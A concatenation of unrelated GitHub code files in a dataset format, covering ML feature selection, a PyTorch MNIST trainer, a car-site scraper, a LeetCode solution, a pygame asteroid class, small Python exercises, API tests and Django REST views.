lb.pd.DataFrame(missing_value_features_list, columns = ['missing_value_features_drop'])\n\n return (df, df_missing_value_features)\n\n\ndef correlation_matrix(df):\n\n feature_corr=df.corr()\n\n return (feature_corr)\n\n\ndef correlation_features_drop(df, target, threshold):\n \n features_corr = correlation_matrix(df)\n\n features_drop_set = set()\n\n columns_list = df.columns.tolist()\n\n for column_1 in columns_list:\n\n for column_2 in columns_list:\n\n if column_1 != target and column_2 != target and column_1 != column_2:\n\n if abs(features_corr.loc[column_1, column_2]) > threshold:\n\n iv_1 = calc_iv_single_feature(df, column_1, target, False)\n\n iv_2 = calc_iv_single_feature(df, column_2, target, False)\n\n features_drop_set.add(column_1 if iv_1 < iv_2 else column_2)\n\n df = df.drop(list(features_drop_set), axis = 1)\n\n df_correlation_features = lb.pd.DataFrame(list(features_drop_set), columns = ['correlation_features_drop'])\n\n return (df, df_correlation_features) \n\n\n\ndef calc_iv_single_feature(df, feature, target, pr=False):\n\n d1 = df.groupby(by=feature, as_index=True)\n\n data = lb.pd.DataFrame()\n\n data['all'] = d1[target].count()\n\n data['bad'] = d1[target].sum()\n\n data['share'] = data['all'] / data['all'].sum()\n\n data['bad_rate'] = d1[target].mean()\n\n data['d_g'] = (data['all'] - data['bad']) / (data['all'] - data['bad']).sum()\n\n data['d_b'] = data['bad'] / data['bad'].sum()\n\n data['woe'] = lb.np.log(data['d_g'] / data['d_b'])\n\n data = data.replace({'woe': {lb.np.inf: 0, -lb.np.inf: 0}})\n\n data['iv'] = data['woe'] * (data['d_g'] - data['d_b'])\n\n data.insert(0, 'variable', feature)\n\n data.insert(1, 'value', data.index)\n\n data.index = range(len(data))\n\n iv = data['iv'].sum()\n\n if pr:\n\n print(data)\n\n print('IV = %s' % iv)\n\n return iv\n\n\ndef iv_features_drop(df, target, threshold):\n\n columns_list = df.columns.tolist()\n\n iv_features_list = [] \n\n for column in columns_list:\n\n column_data_type = df.dtypes[column]\n\n if column != target:\n\n iv = calc_iv_single_feature(df, column, target, pr=False)\n\n if iv <= threshold:\n\n df = df.drop([column], axis = 1)\n\n iv_features_list.append(column)\n\n df_iv_features = lb.pd.DataFrame(iv_features_list, columns = ['iv_features_drop']) \n\n return (df, df_iv_features) \n\n\ndef psi(score_initial, score_new, num_bins = 10, mode = 'quantile'):\n \n eps = 1e-4\n\n if len(set(score_initial)) < num_bins + 1:\n\n num_bins = 1\n\n # Sort the data\n score_initial.sort()\n\n score_new.sort()\n \n # Prepare the bins\n min_val = min(min(score_initial), min(score_new))\n\n max_val = max(max(score_initial), max(score_new))\n\n if mode == 'fixed':\n\n bins = [min_val + (max_val - min_val)*(i)/num_bins for i in range(num_bins+1)]\n\n elif mode == 'quantile':\n\n bins = lb.pd.qcut(score_initial, q = num_bins, retbins = True)[1] # Create the quantiles based on the initial population\n\n else:\n\n raise ValueError(f\"Mode \\'{mode}\\' not recognized. 
Your options are \\'fixed\\' and \\'quantile\\'\")\n\n bins[0] = min_val - eps # Correct the lower boundary\n\n bins[-1] = max_val + eps # Correct the higher boundary\n \n \n # Bucketize the initial population and count the sample inside each bucket\n\n bins_initial = lb.pd.cut(score_initial, bins = bins, labels = range(1,num_bins+1))\n\n df_initial = lb.pd.DataFrame({'initial': score_initial, 'bin': bins_initial})\n\n grp_initial = df_initial.groupby('bin').count()\n\n grp_initial['percent_initial'] = grp_initial['initial'] / sum(grp_initial['initial'])\n \n # Bucketize the new population and count the sample inside each bucket\n bins_new = lb.pd.cut(score_new, bins = bins, labels = range(1,num_bins+1))\n\n df_new = lb.pd.DataFrame({'new': score_new, 'bin': bins_new})\n\n grp_new = df_new.groupby('bin').count()\n\n grp_new['percent_new'] = grp_new['new'] / sum(grp_new['new'])\n \n # Compare the bins to calculate PSI\n psi_df = grp_initial.join(grp_new, on = \"bin\", how = \"inner\")\n\n \n # Add a small value for when the percent is zero\n psi_df['percent_initial'] = psi_df['percent_initial'].apply(lambda x: eps if x == 0 else x)\n\n psi_df['percent_new'] = psi_df['percent_new'].apply(lambda x: eps if x == 0 else x)\n \n # Calculate the psi\n psi_df['psi'] = (psi_df['percent_initial'] - psi_df['percent_new']) * lb.np.log(psi_df['percent_initial'] / psi_df['percent_new'])\n \n # Return the psi values\n return psi_df['psi'].values\n\n '''\n example to use this function \n for col in df.columns.tolist():\n\n csi_values = psi(df['age'].values, 1.01*(df['age'].values), mode = 'quantile')\n\n print (lb.np.mean(csi_values))\n '''\n\n\ndef psi_features_drop(df, target, time_threshold, cut_off_threshold):\n\n columns_list = df.columns.tolist()\n\n psi_features_list = []\n\n for column in columns_list:\n\n column_data_type = df.dtypes[column]\n\n if column != target:\n\n initial = lb.np.array(df.loc[:int(df.shape[0]*time_threshold), column].values)\n\n new = lb.np.array(df.loc[int(df.shape[0]*time_threshold):, column].values)\n\n psi_values_list = psi(initial, new, ps.BIN_NUM, mode = 'quantile')\n\n if lb.np.mean(psi_values_list) > cut_off_threshold:\n\n df = df.drop([column], axis = 1)\n\n psi_features_list.append(column)\n \n df_psi_features = lb.pd.DataFrame(psi_features_list, columns = ['psi_features_drop'])\n\n return (df, df_psi_features)\n","repo_name":"zzwtgts/mlflow_automation","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14937350739","text":"from data import MINSTdataSet\nfrom net import netV1\nfrom torch.utils.data import DataLoader\nimport torch, torch.optim\nfrom torch.utils.tensorboard import SummaryWriter\nimport time, warnings\nwarnings.filterwarnings('ignore')\n\nDEVICE = 'cuda:0' # 设备上可能有多个多个显卡,0表示显卡序列\n\nclass train:\n '''\n 训练模型,梯度下降过程\n '''\n\n def __init__(self, root):\n '''\n 模型的准备工作,如加载数据集和网络模型,定义损失,优化器,\n :param root: data中获取数据集的地址\n '''\n\n # 把所有数据的地址加载进来\n self.train_dataset = MINSTdataSet(root)\n # 按批次在数据集中加载数据\n self.train_dataloder = DataLoader(self.train_dataset, batch_size=100, shuffle=True, num_workers=8)\n\n # 加载验证集\n self.test_dataset = MINSTdataSet(root, is_train=False)\n self.test_dataloader = DataLoader(self.test_dataset, batch_size=100, shuffle=False, num_workers=0)\n\n # 定义网络\n self.net = netV1()\n\n # 加载已经存在的参数\n if self.net.load_state_dict(torch.load(\"checkpoint/40.apk\")):\n 
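# NOTE (editor): load_state_dict() returns a key-compatibility report, not a success flag, and torch.load() raises if the file is missing — so this guard is misleading; checking os.path.exists(\"checkpoint/40.apk\") before loading would be a safer (assumed) guard.\n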
self.net.load_state_dict(torch.load(\"checkpoint/40.apk\"))\n\n # 将网���放到 GPU 上面去,在参数 加载完成后执行\n self.net.to(DEVICE)\n\n # 定义优化器\n self.optim = torch.optim.Adam(self.net.parameters())\n\n def __call__(self):\n '''\n 实例化的时候就会调用 call 如 train_moid = train() train_moid()\n 实现后向学习\n :param args:\n :param kwargs:\n :return:\n '''\n # 打开tensorboard 打开cmd切换到项目文件路径下,执行tensorboard --logdir=ligs, 浏览器打开 localhost:6006\n self.summarywriter = SummaryWriter('./logs')\n\n for epoch in range(10000):\n\n train_ts = time.time()\n train_sum_loss = 0\n for i, (img, tage)in enumerate(self.train_dataloder):\n # 这一轮就把六万张图片训练完成了,\n # 把数据和标签放入GPU进行计算, pytorch的张量放到CUDA上直接 张量.cuda 或者 张量.to(DEVICE)\n input, tage = img.to(DEVICE), tage.to(DEVICE)\n out = self.net(input)\n loss = torch.mean((out - tage) ** 2)\n\n self.optim.zero_grad()\n # 这儿的损失是在GPU上算的\n loss.backward()\n self.optim.step()\n\n # item 计算的是python的标量,不可以放到CUDA上计算,所以要转为cpu上计算\n train_sum_loss += loss.cpu().detach().item()\n train_avg_loss =train_sum_loss/ len(self.train_dataloder)\n train_te = time.time()\n train_time = train_te - train_ts\n\n # 验证\n test_sum_loss = 0\n test_ts = time.time()\n score_sum = 0\n for i, (img, tage) in enumerate(self.test_dataloader):\n # 把数据个标签放入GPU进行计算\n input, test_tage = img.to(DEVICE), tage.to(DEVICE)\n test_output = self.net(input)\n loss = torch.mean((test_output - test_tage) ** 2)\n test_sum_loss += loss.cpu().item()\n\n # 将输出转化为 one_hot\n # index_testout = torch.argmax(test_output, dim=1, keepdim=True)\n # test_output = test_output.scatter_(1, index_testout, 1)\n # score_sum += torch.sum(torch.eq(test_output, test_tage).float())\n\n pre_tage = torch.argmax(test_output, dim=1)\n label_tage = torch.argmax(test_tage,dim=1)\n score_sum +=torch.sum(torch.eq(pre_tage, label_tage).float())\n\n test_avg_loss = loss.item() / len(self.test_dataloader)\n test_te = time.time()\n test_time = test_te - test_ts\n score_avg = score_sum / len(self.test_dataset)\n\n # add_scalars用来保存多个值, add_scalar只能保存一个\n self.summarywriter.add_scalars(\"loss\", {\"train_avg_loss\":train_avg_loss, \"test_avg_loss\":test_avg_loss}, epoch)\n self.summarywriter.add_scalar(\"score\", score_avg, epoch)\n\n # 保存网络参数 w, b,不会自动创建文件 需要先将文件夹创建出来,按轮次保存,保存的格式为 .apk 或则 .t 文件 为二进制文件\n # 防止出现意外情况,保留参数\n torch.save(self.net.state_dict(), f\"./checkpoint/{epoch}.apk\")\n print(epoch, train_avg_loss, train_time, test_avg_loss, test_time, score_avg.item())\nif __name__ == '__main__':\n train = train(\"data/MNIST_IMG\")\n train()\n\n # x = torch.tensor([[0.2, 0.22, 0.12, 0.78],\n # [0.2, 0.22, 0.82, 0.78],\n # [0.92, 0.22, 0.12, 0.78]])\n # h = torch.tensor([[0,0,0,1],\n # [0,0,1,0],\n # [0,0,0,1]])\n #\n # y = torch.argmax(x, dim=1, keepdim=True )\n # print(y)\n # # z = torch.zeros(x.shape).scatter_(1, y, 1)\n # z = x.scatter_(1, y, 1)\n # print(z)\n #\n # score_sum = torch.sum(torch.eq(h, z).float())\n # # score_sum = torch.eq(h, z)\n # print(score_sum/3)\n # print(torch.cuda.is_available())","repo_name":"urnotmo/MINST","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33897845288","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom lxml import html\nimport csv\n\n\nclass hatla2eeScraper:\n def __init__(self):\n self.url = 'https://eg.hatla2ee.com/en/car'\n self.optionsUrl = 'https://eg.hatla2ee.com/en/carSell/model?Brand='\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; \"\n \"x64; 
rv:66.0) \"\n \"Gecko/20100101 Firefox/66.0\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept\": \"text/html,application/xhtml+xml,\"\n \"application/xml;q=0.9,*/*;q=0.8\",\n }\n self.cars = []\n self.cars.append(['make', 'model', 'year'])\n\n def getMakes(self):\n try:\n request = requests.get(url=self.url, headers=self.headers)\n request.encoding = \"utf-8\"\n html = request.text\n carMainPage = BeautifulSoup(html, \"lxml\")\n makeSelect = carMainPage.find('select', id='make')\n self.makes = []\n skip = 1\n for option in makeSelect.find_all('option'):\n if skip == 1:\n skip = 0\n continue\n make = []\n make.append(option['value'])\n make.append(option.text)\n self.makes.append(make)\n except Exception as e:\n print(e)\n exit(1)\n\n def getModels(self, makeCode, makeName):\n try:\n url = self.optionsUrl + makeCode\n request = requests.get(url=url, headers=self.headers)\n request.encoding = \"utf-8\"\n html = request.text\n makeOptions = BeautifulSoup(html, \"lxml\")\n skip = 1\n for option in makeOptions.find_all('option'):\n if skip == 1:\n skip = 0\n continue\n for i in range(1991,2021):\n car = []\n car.append(makeName)\n car.append(option.text)\n car.append(i)\n self.cars.append(car)\n except Exception as e:\n print(e)\n exit(1)\n\nif __name__ == \"__main__\":\n scraper = hatla2eeScraper()\n scraper.getMakes()\n skip = 1\n for make in scraper.makes:\n #skip headers row\n if skip == 1:\n skip=0\n continue\n scraper.getModels(make[0],make[1])\n with open('cars.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerows(scraper.cars)\n","repo_name":"milror00/hatla2eeScraper","sub_path":"app/hatla2eeScraper.py","file_name":"hatla2eeScraper.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878961128","text":"# link : https://leetcode.com/problems/combination-sum-ii/description/\n# author : Mohamed Ibrahim\n\n\nclass Solution :\n\n def combinationSum2(self, candidates, target):\n candidates.sort() \n result = []\n self.combine_sum_2(candidates, 0, [], result, target)\n return result\n \n def combine_sum_2(self, nums, start, path, result, target):\n\n if target == 0:\n result.append(path)\n return\n \n for i in range(start, len(nums)):\n if i > start and nums[i] == nums[i - 1]:\n continue\n if nums[i] > target:\n break\n self.combine_sum_2(nums, i + 1, path + [nums[i]], result, target - nums[i])\n\n\n\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"LeetCode/40. Combination Sum II.py","file_name":"40. 
Combination Sum II.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"39301985458","text":"import pygame\nimport random\n\nlargura = 700\naltura = 700\n\nclass Asteroide:\n def __init__(self, tamanho, x, y):\n self._tamanho = tamanho\n\n if self.tamanho == 3:\n self._asteroide_imagem = pygame.image.load('asteroide3.png')\n elif self.tamanho == 2:\n self._asteroide_imagem = pygame.image.load('asteroide2.png')\n elif self.tamanho == 1:\n self._asteroide_imagem = pygame.image.load('asteroide1.png')\n\n self._asteroide_obj = self.asteroide_imagem.get_rect()\n self._velocidade = 1\n\n self.asteroide_obj.centerx = x\n self.asteroide_obj.centery = y\n\n self.direcao_asteroide = random.randrange(0, 360, 45)\n\n @property\n def tamanho(self):\n return self._tamanho\n\n @property\n def asteroide_imagem(self):\n return self._asteroide_imagem\n\n @property\n def asteroide_obj(self):\n return self._asteroide_obj\n\n @property\n def velocidade(self):\n return self._velocidade\n\n def asteroide_saiu_tela(self):\n x, y = self.pegar_asteroide_posicao()\n\n if x <= 0: x = largura\n elif x > largura + 10: x = 1\n\n if y <= 0: y = altura\n elif y > altura + 10: y = 1\n\n self.colocar_asteroide_posicao(x, y)\n\n def asteroide_trajetoria(self):\n self.asteroide_saiu_tela()\n\n if self.direcao_asteroide == 0 or self.direcao_asteroide == 360: self.asteroide_movimentar(0, -self.velocidade)\n elif self.direcao_asteroide == 45: self.asteroide_movimentar(-self.velocidade, -self.velocidade)\n elif self.direcao_asteroide == 90: self.asteroide_movimentar(-self.velocidade, 0)\n elif self.direcao_asteroide == 135: self.asteroide_movimentar(-self.velocidade, self.velocidade)\n elif self.direcao_asteroide == 180: self.asteroide_movimentar(0, self.velocidade)\n elif self.direcao_asteroide == 225: self.asteroide_movimentar(self.velocidade, self.velocidade)\n elif self.direcao_asteroide == 270: self.asteroide_movimentar(self.velocidade, 0)\n elif self.direcao_asteroide == 315: self.asteroide_movimentar(self.velocidade, -self.velocidade)\n\n def asteroide_movimentar(self, x, y):\n self.asteroide_obj.move_ip(x, y)\n\n def colocar_asteroide_tela(self, superficie):\n superficie.blit(self.asteroide_imagem, self.asteroide_obj)\n\n def pegar_asteroide_posicao(self):\n return self.asteroide_obj.center\n\n def colocar_asteroide_posicao(self, x, y):\n self.asteroide_obj.center = x, y","repo_name":"rodolfobolconte/jogo-star-asteroids-wars","sub_path":"asteroide.py","file_name":"asteroide.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20751957862","text":"height = input('請輸入身高(公分): ')\nweight = input('請輸入體重(公斤): ')\n\nheight = float(height)\nweight = float(weight)\n\nbmi = weight/((height/100)*(height/100))\n\nif bmi < 18.5:\n\tprint('體重過輕')\nelif bmi >= 18.5 and bmi < 24:\n\tprint('正常')\nelif bmi >= 24 and bmi < 27:\n\tprint('過重')\nelif bmi >= 27 and bmi < 30:\n\tprint('輕度肥胖')\nelif bmi >= 30 and bmi < 35:\n\tprint('中度肥胖')\nelse:\n\tprint('重度肥胖')","repo_name":"abuju0525/bmi","sub_path":"bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41129498717","text":"class Pessoa():\n def __init__(self, nome, idade, prof):\n self.nome = nome\n self.idade = idade\n self.prof = prof\n def saudacao(self):\n 
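# greeting method; the Portuguese f-string below reads: \"Hi, my name is {nome}, I am {idade} years old and I am a {prof}.\"\n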
print(f'Oi, meu nome é {self.nome}, tenho {self.idade} anos e sou {self.prof}.')\npedro = Pessoa('Pedro', 25, 'reporter')\npedro.saudacao()\n\nguilherme = Pessoa('Guilherme', 18, 'estudante')\nguilherme.saudacao()\n\newe = Pessoa('Ewewlyn', 18, 'estudante')\newe.saudacao()\n\n \n ","repo_name":"GustaGitDev/FabricaDeSoftware","sub_path":"Poo/pessoa.py","file_name":"pessoa.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72319709609","text":"# coding=utf-8\nimport json\nfrom http.client import InvalidURL\nfrom urllib.parse import parse_qs, urlsplit\n\nimport pytest\nfrom asynctest import CoroutineMock\n\nfrom acme.api import Api\nfrom acme.errors.api import ApiError\n\n\ndef test_call_api_with_inexistent_path(api):\n with pytest.raises(InvalidURL):\n api.foo()\n\n\ndef test_build_url(api, config):\n path = 'purchases_by_user'\n params = {\n 'limit': 10,\n 'games': 'yes'\n }\n user = 'some_user'\n\n url = api._build_url(path, params, username=user)\n\n # We can't simply test if url == 'expected_url' because the query\n # parameters may not be in the order we assume, so let's break it\n # apart and test each component individually.\n\n parsed = urlsplit(url)\n\n assert parsed.path == '/api/' + api._paths[path].format(username=user)\n\n p = parse_qs(parsed.query)\n assert p == {'limit': ['10'], 'games': ['yes']}\n\n result = parsed.scheme + '://' + parsed.netloc + '/api/'\n assert result == config['API_BASE_URL']\n\n\ndef test_build_url_with_no_params(api):\n \"\"\"\n If no query string parameters are passed, the resulting URL should\n have none either.\n \"\"\"\n\n url = api._build_url('purchases_by_user', username='foo')\n\n parsed = urlsplit(url)\n\n p = parse_qs(parsed.query)\n assert p == {}\n\n\nasync def test_cache(config, http, cache):\n \"\"\"\n Make sure an API method, when called more than once with the same\n parameters, only results in one HTTP call, since the second time it\n gets the data from the cache.\n \"\"\"\n http.get = CoroutineMock()\n text = '{}'\n http.get.return_value = {'status': 200, 'text': text}\n api = Api(config, http, cache)\n\n user = 'some_user'\n params = {'limit': 10}\n\n await api.purchases_by_user(params, username=user)\n await api.purchases_by_user(params, username=user)\n\n path = api._paths['purchases_by_user'].format(username=user)\n url = config['API_BASE_URL'] + path + '?limit=10'\n api.http.get.assert_called_once_with(url)\n\n\nasync def test_failing_api_call(config, http, cache):\n http.get = CoroutineMock()\n http.get.return_value = {'status': 500}\n api = Api(config, http, cache)\n\n product_id = 10\n params = {'limit': 10}\n\n with pytest.raises(ApiError):\n await api.purchases_by_product(params, product_id=product_id)\n\n\nasync def test_purchases_by_user(config, http, cache):\n \"\"\"\n I will only test this API method since the others all run the same\n code and the HTTP call result is mocked by me. 
Thus, it doesn't make\n much sense to test all the methods unless I were to test the real\n API, which returns different results for each of the methods.\n \"\"\"\n http.get = CoroutineMock()\n text = '{}'\n http.get.return_value = {'status': 200, 'text': text}\n api = Api(config, http, cache)\n\n user = 'some_user'\n params = {'limit': 10}\n\n result = await api.purchases_by_user(params, username=user)\n\n assert result == json.loads(text)\n\n path = api._paths['purchases_by_user'].format(username=user)\n url = config['API_BASE_URL'] + path + '?limit=10'\n api.http.get.assert_called_with(url)\n","repo_name":"borfast/acmemegastore","sub_path":"test/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5109578268","text":"# coding:utf-8\nimport init_environ\nimport datetime,time\n\nfrom apps.common.utils.utils_log import log\nfrom apilib import QNApp\nfrom apps.web.models import AppComment\nfrom apps.common.models import Config\n\ndef get_comment_by_date(date, page, app):\n \"\"\"获取某一天的所有5分好评\"\"\"\n tapi = QNApp.init_tapi(None)\n temp_list, comment_list = [], []\n result = tapi.fuwu_sale_scores_get(current_page = page, page_size = 100, date = date)\n if result and result.score_result and result.score_result.score_result:\n temp_list = result.score_result.score_result\n for comment in temp_list:\n if comment.avg_score == '5.0':\n comment_list.append(comment)\n return comment_list\n\ndef save_comment(comment_dict):\n \"\"\"保存评论\"\"\"\n app_comment = AppComment()\n app_comment.id = comment_dict['id']\n app_comment.avg_score = comment_dict['avg_score']\n app_comment.suggestion = comment_dict['suggestion'] if 'suggestion' in comment_dict else ''\n app_comment.service_code = comment_dict['service_code'] if 'service_code' in comment_dict else ''\n app_comment.user_nick = comment_dict['user_nick'] if 'user_nick' in comment_dict else ''\n app_comment.gmt_create = comment_dict['gmt_create']\n app_comment.item_code = comment_dict['item_code'] if 'item_code' in comment_dict else ''\n app_comment.item_name = comment_dict['item_name'] if 'item_name' in comment_dict else ''\n app_comment.is_pay = comment_dict['is_pay'] if 'is_pay' in comment_dict else ''\n app_comment.is_recommend = 0\n app_comment.save()\n\ndef get_history_comment(app):\n \"\"\"获取历史的某一天至今的好评\"\"\"\n key = 'web.SYNC_WEB_COMMENT' if app == 'web' else 'web.SYNC_QN_COMMENT'\n cfg = Config.objects.get(key = key)\n today = datetime.date.today()\n cur_date_count = 0\n date = datetime.datetime.strptime(cfg.value, '%Y-%m-%d').date()\n page = 1\n now_date = time.strftime(\"%Y-%m-%d\", time.localtime())\n while date<=today:\n try:\n comment_list = get_comment_by_date(date, page, app)\n comment_id_list = [comment.id for comment in comment_list]\n # 首先检查数据库中有没有这些评论,若有则无需保存\n temp_id_list = AppComment.objects.filter(id__in=comment_id_list).values_list('id', flat=True)\n for comment in comment_list:\n comment_dict = comment.to_dict()\n if 'suggestion' in comment_dict and comment_dict['suggestion'] and comment_dict['id'] not in temp_id_list:\n cur_date_count += 1\n save_comment(comment_dict)\n if len(comment_list)<100:\n # 如果本次取得的数据条数小于100条,当天无更多评论,然后取下一天\n log.info('%s:%s有%s条新好评' % (date, app, cur_date_count))\n date = date + datetime.timedelta(days = 1)\n page = 1\n cur_date_count = 0\n else:\n #如果本次取得的数据条数等于100条,则有可能还有数据,需要取下一页数据\n page += 1\n except:\n log.info('同步评论出现异常,暂停10秒')\n time.sleep(10)\n # 每次取数据后暂停5秒\n
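# NOTE (editor): the comment above says \"pause 5 seconds after each fetch\" but the code sleeps 3 — behavior kept as-is, flagged for consistency.\n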
time.sleep(3)\n cfg.value = now_date\n cfg.save()\n\ndef main():\n get_history_comment('web')\n get_history_comment('qn')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Florence3546/CRM","sub_path":"scripts/sync_app_comments.py","file_name":"sync_app_comments.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36214142420","text":"from rest_framework import pagination, serializers, status\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import mixins, generics, viewsets\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\n# from rest_framework.decorators import api_view\nfrom rest_framework.throttling import UserRateThrottle, AnonRateThrottle, ScopedRateThrottle\nfrom django_filters import rest_framework as filters\nfrom rest_framework import filters\nfrom watchlist_app.api.pagination import WatchListPagination, WatchListLOPagination, WatchListCursorPagination\nfrom watchlist_app.api.permissions import AdminorReadOnly, ReviewUserorReadOnly\nfrom watchlist_app.api.serializers import WatchListSerializer, StreamPlatformSerializer, ReviewSerializer\nfrom watchlist_app.models import WatchList, StreamPlatform, Review\nfrom watchlist_app.api.throttling import StreamPlatformThrottle\n\nimport logging\n\n# logger = logging.getLogger('django')\n\n\nlogger = logging.getLogger('django')\n# logger.setLevel(logging.DEBUG)\n\n# formatter = logging.Formatter('%(levelname)s:%(asctime)s:%(name)s:%(message)s')\n\n# file_handler = logging.FileHandler('logs/sample.log')\n# file_handler.setLevel(logging.ERROR)\n# file_handler.setFormatter(formatter)\n\n# stream_handler = logging.StreamHandler()\n# stream_handler.setFormatter(formatter)\n\n# logger.addHandler(file_handler)\n# logger.addHandler(stream_handler)\n\n# Class based views\n\nclass WatchListGV(generics.ListAPIView):\n queryset = WatchList.objects.all()\n serializer_class = WatchListSerializer\n pagination_class = WatchListCursorPagination\n # filter_backends = [filters.OrderingFilter]\n # ordering_fields = ['created']\n # ordering = ['number_rating']\n\n\n\nclass UserReviews(generics.ListAPIView):\n serializer_class = ReviewSerializer\n\n def get_queryset(self):\n # username = self.kwargs['username']\n username = self.request.query_params.get('username')\n\n return Review.objects.filter(review_user__username=username)\n\n\nclass StreamPlatformViewSet(viewsets.ModelViewSet):\n queryset = StreamPlatform.objects.all()\n serializer_class = StreamPlatformSerializer\n permission_classes = [IsAuthenticated]\n # throttle_classes = [StreamPlatformThrottle]\n throttle_scope = 'streaming'\n\n\n# class StreamPlatformVS(viewsets.ViewSet):\n\n# def list(self, request):\n# queryset = StreamPlatform.objects.all()\n# serializer = StreamPlatformSerializer(queryset, many=True)\n# return Response(serializer.data)\n\n# def retrieve(self, request, pk=None):\n# queryset = StreamPlatform.objects.all()\n# watchlist = get_object_or_404(queryset, pk=pk)\n# serializer = StreamPlatformSerializer(watchlist)\n# return Response(serializer.data)\n\n\n\nclass ReviewCreate(generics.CreateAPIView):\n serializer_class = ReviewSerializer\n\n def get_queryset(self):\n return Review.objects.all()\n\n def perform_create(self, serializer):\n pk = self.kwargs.get('pk')\n watchlist = 
WatchList.objects.get(pk=pk)\n\n review_user = self.request.user\n review_queryset = Review.objects.filter(watchlist=watchlist, review_user=review_user)\n\n if review_queryset.exists():\n raise ValidationError('You have reviewed already')\n\n if watchlist.number_rating == 0:\n watchlist.avg_rating = serializer.validated_data['rating']\n else:\n watchlist.avg_rating = (watchlist.avg_rating + serializer.validated_data['rating']) / 2\n \n watchlist.number_rating = watchlist.number_rating+ 1\n watchlist.save()\n\n serializer.save(watchlist=watchlist, review_user=review_user)\n\n\n\nclass ReviewList(generics.ListCreateAPIView):\n # queryset = Review.objects.all()\n serializer_class = ReviewSerializer\n # permission_classes = [IsAuthenticated]\n filter_backends = [filters.SearchFilter]\n # filterset_fields = ('review_user__username', 'active')\n search_fields = ['review_user__username', 'description']\n\n\n def get_queryset(self):\n pk = self.kwargs['pk']\n return Review.objects.filter(watchlist=pk)\n\n\n\nclass ReviewDetails(generics.RetrieveUpdateDestroyAPIView):\n queryset = Review.objects.all()\n serializer_class = ReviewSerializer\n permission_classes = [ReviewUserorReadOnly]\n\n\n\n# class ReviewDetail(mixins.RetrieveModelMixin, generics.GenericAPIView):\n# queryset = Review.objects.all()\n# serializer_class = ReviewSerializer\n\n# def get(self, request, *args, **kwargs):\n# return self.retrieve(request, *args, **kwargs)\n\n\n\n# class ReviewList(mixins.ListModelMixin,\n# mixins.CreateModelMixin,\n# generics.GenericAPIView):\n\n# queryset = Review.objects.all()\n# serializer_class = ReviewSerializer\n\n \n# def get(self, request, *args, **kwargs):\n# return self.list(request, *args, **kwargs)\n\n# def post(self, request, *args, **kwargs):\n# return self.create(request, *args, **kwargs)\n\n\n\nclass WatchListAV(APIView):\n\n def get(self, request):\n movies = WatchList.objects.all()\n serializer = WatchListSerializer(movies, many=True)\n logger.debug(serializer.data)\n return Response(serializer.data)\n\n\n def post(self, request):\n serializer = WatchListSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.info(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n logger.error(serializer.errors)\n return Response(serializer.errors)\n\n\nclass WatchDetailsAV(APIView):\n\n def get(self, request, pk):\n \n try:\n movie = WatchList.objects.get(pk=pk)\n except WatchList.DoesNotExist:\n content = {'error': 'Movie not found'}\n logger.error(content)\n return Response(content, status=status.HTTP_404_NOT_FOUND)\n \n serializer = WatchListSerializer(movie)\n logger.info('All watchlist names')\n logger.info(serializer.data)\n return Response(serializer.data)\n\n\n def put(self, request, pk):\n movie = WatchList.objects.get(pk=pk)\n serializer = WatchListSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.info(serializer.data)\n return Response(serializer.data)\n else:\n logger.error(serializer.errors)\n return Response(serializer.errors)\n\n\n def delete(self, request, pk):\n movie = WatchList.objects.get(pk=pk)\n movie.delete()\n content ={ 'response': 'deleted successfully' }\n return Response(content, status=status.HTTP_204_NO_CONTENT)\n\n\n\n# class StreamPlatformListAV(APIView):\n\n# def get(self, request):\n# stream_platforms = StreamPlatform.objects.all()\n# serializer = StreamPlatformSerializer(stream_platforms, many=True)\n# return Response(serializer.data)\n\n\n# def 
